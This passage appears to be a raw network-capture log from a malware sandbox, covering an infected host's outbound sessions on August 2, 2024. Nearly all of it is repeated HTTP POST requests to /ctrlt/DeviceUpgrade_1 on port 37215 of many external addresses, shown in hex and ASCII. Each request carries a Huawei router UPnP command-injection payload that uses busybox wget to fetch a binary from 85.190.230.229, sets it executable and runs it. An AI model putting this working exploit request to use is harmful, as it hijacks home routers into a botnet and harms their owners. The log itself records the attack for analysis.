37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      109192.168.2.1455966102.210.83.21337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.726736069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      110192.168.2.1453014102.8.72.6637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.728137016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658031940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746069908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889988899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      111192.168.2.1435614197.61.91.22637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.729290009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658061981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746073961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889940977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241763115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945389032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 